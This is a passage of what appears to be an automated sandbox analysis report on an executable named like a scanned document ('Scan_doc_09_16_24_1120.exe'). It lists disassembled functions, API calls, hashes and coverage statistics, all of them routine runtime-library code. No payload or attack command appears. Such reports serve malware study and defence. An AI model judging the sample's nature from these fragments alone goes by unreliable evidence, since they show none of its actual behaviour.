                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: 542fc8b0a7daac8a524a1fa1e9d3fc4ec32c7ccf6b071e48ca90125217ed6749
                                                                                                                                                                                                                                                                          • Instruction ID: ef478fc77ac22b89c1ed35983b8b807f61f37814ae21013a9e3b6a6648c418ed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 542fc8b0a7daac8a524a1fa1e9d3fc4ec32c7ccf6b071e48ca90125217ed6749
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F04FB0A00608BBCB159B94DC5DBAEBFB4FF88B56F004064FA05E6250DB359E44CAD0
                                                                                                                                                                                                                                                                          Function 0083634D Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 400 83634d-836372 call 833f72 403 836374-83637c 400->403 404 83637f-8363a5 MultiByteToWideChar 400->404 403->404 405 836444-836448 404->405 406 8363ab-8363b7 404->406 409 836454-836469 call 83123a 405->409 410 83644a-83644d 405->410 407 836403 406->407 408 8363b9-8363ca 406->408 414 836405-836407 407->414 411 8363e5-8363eb 408->411 412 8363cc-8363db call 83ac20 408->412 410->409 418 8363ec call 8362ff 411->418 416 83643d-836443 call 83646a 412->416 426 8363dd-8363e3 412->426 415 836409-83642b call 8320b0 MultiByteToWideChar 414->415 414->416 415->416 428 83642d-83643b GetStringTypeW 415->428 416->405 423 8363f1-8363f6 418->423 423->416 427 8363f8 423->427 429 8363fe-836401 426->429 427->429 428->416 429->414
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,008354C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0083639A
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 008363D2
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00836423
                                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00836435
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0083643E
                                                                                                                                                                                                                                                                            • Part of subcall function 008362FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00837E5B,?,00000000,?,0083686F,?,00000004,00000000,?,?,?,00833BCD), ref: 00836331
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1857427562-0
                                                                                                                                                                                                                                                                          • Opcode ID: ff7d39f63aa062b8a0be63b80d8dea1700a63da4b4436334bf7154fb53e7d329
                                                                                                                                                                                                                                                                          • Instruction ID: 58cea69c8b8c27c87b33834b1b943ad00d90fe3a1c299451089f3af2807b8378
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7d39f63aa062b8a0be63b80d8dea1700a63da4b4436334bf7154fb53e7d329
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E931CB72A0020AABDF259F68DC85DAE7BA5FF80710F148128FC14DA250EB35CD61CBE1
                                                                                                                                                                                                                                                                          Function 0083561E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 430 83561e-835633 GetEnvironmentStringsW 431 835635-835655 call 8355e7 WideCharToMultiByte 430->431 432 83568b 430->432 431->432 438 835657 431->438 433 83568d-83568f 432->433 435 835691-835692 FreeEnvironmentStringsW 433->435 436 835698-8356a0 433->436 435->436 439 835658 call 8362ff 438->439 440 83565d-835662 439->440 441 835680 440->441 442 835664-835678 WideCharToMultiByte 440->442 444 835682-835689 call 834869 441->444 442->441 443 83567a-83567e 442->443 443->444 444->433
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00835627
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0083564A
                                                                                                                                                                                                                                                                            • Part of subcall function 008362FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00837E5B,?,00000000,?,0083686F,?,00000004,00000000,?,?,?,00833BCD), ref: 00836331
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00835670
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00835683
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00835692
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2278895681-0
                                                                                                                                                                                                                                                                          • Opcode ID: 203c5b36873ca12b5160134402d6d45bbaaa3cd58c30b17131357a7306e15dd4
                                                                                                                                                                                                                                                                          • Instruction ID: 28159fe34a363793a1813c8a622297cc0609ebd8b232230ea022e524fae49d41
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 203c5b36873ca12b5160134402d6d45bbaaa3cd58c30b17131357a7306e15dd4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D801F7B2601E197F67211ABA9C5EC7F6B6DFED2BA07560539F914C7100FB608C0181F0
                                                                                                                                                                                                                                                                          Function 008344A8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 447 8344a8-8344bf GetLastError 448 8344c1-8344cb call 835904 447->448 449 8344cd-8344d2 447->449 448->449 454 83451e-834525 SetLastError 448->454 451 8344d4 call 83480c 449->451 453 8344d9-8344df 451->453 455 8344e1 453->455 456 8344ea-8344f8 call 83595a 453->456 457 834527-83452c 454->457 458 8344e2-8344e8 call 834869 455->458 463 8344fa-8344fb 456->463 464 8344fd-834513 call 834296 call 834869 456->464 466 834515-83451c SetLastError 458->466 463->458 464->454 464->466 466->457
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,008347FE,00837E79,?,0083686F,?,00000004,00000000,?,?,?,00833BCD,?,00000000), ref: 008344AD
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008344E2
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834509
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00834516
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0083451F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 988ed378900d006532962738a78b64901bdacb3bff0e01d1c9202b1649fd3d4c
                                                                                                                                                                                                                                                                          • Instruction ID: 4302f6578e0a4904ff7706a435a6e3ea2ba15d9b9fa76e6dc97238c67f93e96b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 988ed378900d006532962738a78b64901bdacb3bff0e01d1c9202b1649fd3d4c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1012D76601A44A7C61277386C49F2B266DFFC1375F202434F92AD2192EF34AD4141E1
                                                                                                                                                                                                                                                                          Function 00836176 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 470 836176-836181 471 836183-83618b 470->471 472 8361dc-8361de 470->472 473 836194-83619d 471->473 474 83618d-836193 call 834869 471->474 476 8361a6-8361af 473->476 477 83619f-8361a5 call 834869 473->477 474->473 479 8361b1-8361b7 call 834869 476->479 480 8361b8-8361c1 476->480 477->476 479->480 484 8361c3-8361c9 call 834869 480->484 485 8361ca-8361d3 480->485 484->485 485->472 488 8361d5-8361db call 834869 485->488 488->472
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083618E
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361A0
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361B2
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361C4
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361D6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: 69a66461e4e7a433051a97227f8f8031cef5779d267869b8b2ec9b41ee0457c7
                                                                                                                                                                                                                                                                          • Instruction ID: e10380c491355859b0248f170e2b77f6276a50c93d96464a182ed7aeed40652c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a66461e4e7a433051a97227f8f8031cef5779d267869b8b2ec9b41ee0457c7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF0C232610240BF8AA0EB1DF885C1EB7DCFAD1B10B194814F40DC3442D738FC808AE0
                                                                                                                                                                                                                                                                          Function 00833D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DAD
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DBF
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DD2
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DE3
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DF4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: b4d7da9ab7697b6eb182eaed54510f9b97a0ef4b8ad8cee7fa86eb9f5fb07580
                                                                                                                                                                                                                                                                          • Instruction ID: b96e6ea57971ae6223ec54ef727b818b3b0fc062d2273d9075bc556eb640f995
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4d7da9ab7697b6eb182eaed54510f9b97a0ef4b8ad8cee7fa86eb9f5fb07580
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F05EBC9052609FCF816F19FC495497B60FBD67207411266F622D63B1C7392982CFC2
                                                                                                                                                                                                                                                                          Function 00832F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe,00000104), ref: 00832F93
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083305E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833068
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe
                                                                                                                                                                                                                                                                          • API String ID: 2506810119-1486388367
                                                                                                                                                                                                                                                                          • Opcode ID: 145fba466864787501e90e2117251c15aa2cafc1f5ea5d3b420a5dd4016088ea
                                                                                                                                                                                                                                                                          • Instruction ID: 72a87333a4aa64001846fe9a90099b49d89d1e6b8ef415b671f58410da5baa2a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 145fba466864787501e90e2117251c15aa2cafc1f5ea5d3b420a5dd4016088ea
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7318DB5A00618AFCB25EB99DC859AEBBBCFBC5710F104066F404D7211DA709A80CBD2
                                                                                                                                                                                                                                                                          Function 008325E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00832594,00000000,?,00841B50,?,?,?,00832737,00000004,InitializeCriticalSectionEx,0083BC48,InitializeCriticalSectionEx), ref: 008325F0
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00832594,00000000,?,00841B50,?,?,?,00832737,00000004,InitializeCriticalSectionEx,0083BC48,InitializeCriticalSectionEx,00000000,?,008324C7), ref: 008325FA
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00832622
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: 78146d6b4a9f6bcfbcd793deda2e2f5c3025218a58c380ad6c067ffe0dc9b380
                                                                                                                                                                                                                                                                          • Instruction ID: 0b01b588281ecd46487cf67a6fc0046232824fa394f9c6608b39968d7e450ab8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78146d6b4a9f6bcfbcd793deda2e2f5c3025218a58c380ad6c067ffe0dc9b380
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE01270640704BBDF112B60EC47B593F54FFA0B51F104420FA1DE40A1E7A1A9549685
                                                                                                                                                                                                                                                                          Function 008357DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00835784,00000000,00000000,00000000,00000000,?,00835981,00000006,FlsSetValue), ref: 0083580F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00835784,00000000,00000000,00000000,00000000,?,00835981,00000006,FlsSetValue,0083C4D8,FlsSetValue,00000000,00000364,?,008344F6), ref: 0083581B
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00835784,00000000,00000000,00000000,00000000,?,00835981,00000006,FlsSetValue,0083C4D8,FlsSetValue,00000000), ref: 00835829
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                          • Opcode ID: d2c74452c88497e7cadf1b9b2b5a390de5f735069e1928bc4126a796f6a639a4
                                                                                                                                                                                                                                                                          • Instruction ID: 7595be3f995d09d1431059c17949d7dcb745537379d13c3d9c9ca8ee79b17083
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2c74452c88497e7cadf1b9b2b5a390de5f735069e1928bc4126a796f6a639a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B01A776615B26ABCB214A68EC44A577798FFC57A1F200934FA1AD7240DB20D800C6E0
                                                                                                                                                                                                                                                                          Function 008348BB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834A27
                                                                                                                                                                                                                                                                            • Part of subcall function 0083474D: IsProcessorFeaturePresent.KERNEL32(00000017,0083473C,00000000,?,00000004,00000000,?,?,?,?,00834749,00000000,00000000,00000000,00000000,00000000), ref: 0083474F
                                                                                                                                                                                                                                                                            • Part of subcall function 0083474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00834771
                                                                                                                                                                                                                                                                            • Part of subcall function 0083474D: TerminateProcess.KERNEL32(00000000), ref: 00834778
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                          • Instruction ID: 61dc99f39bb7982f747639ddfe075047ff8575ac0051157fbd952d07a0dc185f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6851A375E00119AFDF14CFA8C881AAEFBF5FF88314F24416AE854E7351E675AE018B90

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:17.7%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:145
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:20
